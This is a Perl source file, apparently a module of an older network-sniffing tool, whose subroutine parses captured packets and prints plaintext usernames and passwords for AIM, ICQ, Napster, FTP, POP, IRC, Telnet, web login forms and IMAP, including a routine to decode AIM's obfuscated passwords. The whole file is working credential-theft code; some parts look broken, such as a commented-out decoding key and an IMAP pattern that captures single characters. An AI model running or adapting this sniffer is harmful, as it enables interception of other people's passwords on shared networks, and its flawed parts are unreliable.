# -sam k (commport5@lucidx.com)

sub pwsniff {
 my ($alla, $call) = ($offset_all, $_[2]);
 if (!%pwsniff) {
  foreach (split(/,\s*/, $snft)) {
   $pwsniff{$_} = 1;
  }
 }
 $packet_all->bset($call, $alla);
# ($vers,$ihl,$tos,$tot,$id,$frg,$ttl,$pro,$chc,$saddr,$daddr,$sport,$dport,$seq,$aseq,$dof,$res1,$res2,$urg,$ack,$psh,$rst,$syn,$fin,$win,$chk,$data) =
# $packet_all->get({ip=>['version','ihl','tos','tot_len','id','frag_off','ttl','protocol','check','saddr','daddr'],tcp=>[
# 'source','dest','seq','ack_seq','doff','res1','res2','urg','ack','psh','rst','syn','fin','window','check','data']});
# $data = substr($_[2], 34 + (unpack("C", substr($_[2], 46, 1))) / 4);
 ($saddr,$daddr,$sport,$dport,$data) =
 $packet_all->get({ip => ['saddr', 'daddr'], tcp => ['source', 'dest', 'data']});
 $ascii = $data;
 $seq =~ s/^-//;
 $stest = &ip2dot($saddr);
 $dtest = &ip2dot($daddr);
 if ($pwsniff{'aim'} and ($sport == 9898 or $dport == 9898)) {
#  @idstr = (0x00, 0x00, 0x00, 0x01, 0x00, 0x01);
#  @encoscar = (0xf3, 0x26, 0x81, 0xc4, 0x39, 0x86, 0xdb, 0x92, 0x71, 0xa3, 0xb9, 0xe6, 0x53, 0x7a, 0x95, 0x7c);
#  @enctoc = (0x54, 0x69, 0x63, 0x2f, 0x54, 0x6f, 0x63);
  if (($name, $enc) = $ascii =~ /toc_signon [^\s]+ \d+ ([^\s+]+) 0x([^\s+]+) /) {
   for (0 .. ((length($enc) - 1) / 2)) { 
    $decrypted .= chr(hex(substr($enc, ($_ * 2), 2)) ^ $enctoc[$_ % scalar(@enctoc)])
   }
  }
  if ($name and $decrypted) {
   print "AIM:\tlogin: $name\tpassword: $decrypted\n";
  }
 }
 if ($pwsniff{'icq'} and ($sport == 4000 or $dport == 4000)) {
  $asci = uri_escape($data);
  if ($asci =~ /\w%13%00%00%08%00([^%]+)%00r%00%04%00%00%00%00%00%04/) {
   print "ICQ:\tlogin: N/A\tpassword: $1\n";
  }
 }
 if ($pwsniff{'napster'} and ($sport == 8888 or $dport == 8888)) {
  if ($ascii =~ /^(\S+) (\S+) \d+ \S+/) {
   print "Napster:\tlogin: $1\tpassword: $2\n";
  }
 }
 if ($pwsniff{'ftp'} and ($sport == 21 or $dport == 21)) {
  if ($ascii =~ /USER ([^\s]+)/) {
   $ftplgn = "FTP:\tlogin: $1\t";
  }
  if ($ascii =~ /PASS ([^\s]+)/) {
   $ftpps =  "password: $1\n";
  }
  if ($ftplgn and $ftpps) {
   print $ftplgn . $ftpps;
   $ftplgn = $ftpps = undef;
  }
 }
 if ($pwsniff{'pop'} and (($sport == 106 or $dport == 106) or ($sport == 109 or $dport == 109) or ($sport == 110 or $dport == 110) or ($sport == 995 or $dport == 995))) {
  if ($ascii =~ /USER ([^\s]+)/) {
   $poplgn = "\tlogin: $1\t";
  }
  if ($ascii =~ /PASS ([^\s]+)/) {
   $popps = "password: $1\n";
  }
  if ($poplgn and $popps) {
   print "POP: $stest -> $dtest -";
   print $poplgn . $popps;
#   print "POP: $dtest -";
#   print $poplgn . $popps;
   $poplgn = $popps = undef;
  }
 }
 if ($pwsniff{'irc'} and (($sport >= 6000 or $dport >= 6000) and ($sport <= 8000 or $dport <= 8000))) {
  if ($ascii =~ /OPER (\S+) (\S+)/) {
   print "IRC:\tlogin: $1\tpassword: $2\n";
  }
 }
 if ($pwsniff{'telnet'} and ($sport == 23 or $dport == 23)) {
  if ($telnet{'login'}) {
   unless ($ascii =~ /\cM/) {
    $telnet{'user'} .= $ascii;
   }
   else {
    $telnet{'login'} = 0;
   }
  }
  if ($telnet{'password'}) {
   unless ($ascii =~ /\cM/) {
    $telnet{'pass'} .= $ascii;
   }
   else {
    $telnet{'password'} = 0;
    print "Telnet:\tlogin: $telnet{'user'}\tpassword: $telnet{'pass'}\n";
    undef($telnet{'pass'});
    undef($telnet{'user'});
   }
  }
  if ($ascii =~ /login:/i) {
   $telnet{'login'}++;
  }
  if ($ascii =~ /password:/i) {
   $telnet{'password'}++;
  }
 }
 if ($pwsniff{'web'} and (($sport == 80 or $dport == 80) or ($sport == 8080 or $dport == 8080))) {
  $asci = uri_unescape($data);
  $asci =~ s/&login=submit//;
#  if ($asci =~ /&(?:$httpl)=([^(?:&|\s+|$)]+)/i) {
  if ($asci =~ /&(?:acctname|alias|domain|fname|email|id|login|loginid|loginname|login_id|mn|name|uid|unickname|user|userid|user_id|username|username_login|u2_username|fullhpd)=([^&\s]+)/i) {
   print "Web:\tlogin: $1\t";
  }
  if ($asci =~ /&(?:pass|passname|passwd|password|password1|password_from_form|password_login|pw|upasswd|u2_password)=([^&\s]+)/i) {
#  if ($asci =~ /&(?:$httpp)=([^(?:&|\s+|$)]+)/i) {
   print "password: $1\n";
  }
 }
# if ($pwsniff{'web'}) {
#  $ascii = uri_unescape($data);
#  $ascii =~ s/&login=submit//;
#  if ($ascii =~ /&fullhpd=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  elsif ($ascii =~ /&userid=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  elsif ($ascii =~ /&username=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  elsif ($ascii =~ /&login=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  elsif ($ascii =~ /&user[^=]*=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  if ($ascii =~ /&pass=([^(?:&|\s+|$)]+)/) {
#   print "password: $1\n";
#  }
#  elsif ($ascii =~ /&passwd=([^(?:&|\s+|$)]+)/) {
#   print "password: $1\n";
#  }
#  elsif ($ascii =~ /&password=([^(?:&|\s+|$)]+)/) {
#   print "password: $1\n";
#  }
#  elsif ($ascii =~ /&pass[^=]+=([^(?:&|\s+|$)]+)/) {
#   print "password: $1\n";
#  }
# }
 if ($pwsniff{'imap'} and (($sport == 143 or $dport == 143) or ($sport == 220 or $dport == 220))) {
  if ($data =~ /2 login "([^"])" "([^"])"/) {
   print "IMAP:\tlogin: $1\t";
   print "password: $2\n";
  }
 }
}

1;